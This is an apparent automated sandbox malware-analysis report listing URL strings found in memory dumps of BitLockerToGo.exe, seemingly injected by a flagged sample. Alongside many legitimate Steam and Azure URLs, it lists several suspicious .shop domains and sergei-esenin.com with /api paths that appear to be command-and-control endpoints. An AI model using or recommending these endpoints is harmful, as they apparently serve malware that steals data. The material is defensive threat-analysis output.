            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://caffegclasiqwp.shop/
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://caffegclasiqwp.shop/B
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://caffegclasiqwp.shop/pi
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://caffegclasiqwp.shop/wq
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
            Source: BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://gallery.azure.com/https://graph.windows.net/mariadb.database.azure.comhttps://storage.azure.
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locatedblsoqp.shop/
            Source: BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locatedblsoqp.shop/=z
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locatedblsoqp.shop/api
            Source: BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locatedblsoqp.shop/apiBY
            Source: BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://locatedblsoqp.shop/m
            Source: BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.s
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://manage.windowsazure.com/publishsettings/indexcrypto/elliptic:
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://manage.windowsazure.us/publishsettings/indexConvertSecurityDescriptorToStringSecurityDescrip
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://management.azure.com/https://managedhsm.azure.net/https://servicebus.azure.net/https://datab
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://management.core.usgovcloudapi.net/https://dev.azuresynapse.usgovcloudapi.netinsufficient
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://management.core.windows.net/https://management.chinacloudapi.cn/https://servicebus.chinaclou
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovcl
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://microsoftgraph.chinacloudapi.cn/crypto/rsa:
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://microsoftgraph.chinacloudapi.cngo
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://millyscroqwp.shop/apin
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nippydxmnwquo.shop/api
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://ossrdbms-aad.database.chinacloudapi.cnfirst
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://ossrdbms-aad.database.usgovcloudapi.netRtlDosPathNameToRelativeNtPathName_U_WithStatusinvali
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://ossrdbms-aad.database.windows.nethttps://management.core.chinacloudapi.cn/https://ossrdbms-a
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.000000000059C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/Z
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/api
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/apiDQ
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/apiU
            Source: BitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/apir
            Source: BitLockerToGo.exe, 00000002.00000003.1646510389.000000000062E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/z
            Source: SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | String found in binary or memory: https://servicebus.windows.net/https://batch.core.windows.net/https://manage.windowsazure.us/https:/
            Source: BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://stagedchheiqwo.shop/
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stagedchheiqwo.shop/Yx
            Source: BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stagedchheiqwo.shop/api
            Source: BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stamppreewntnq.shop/
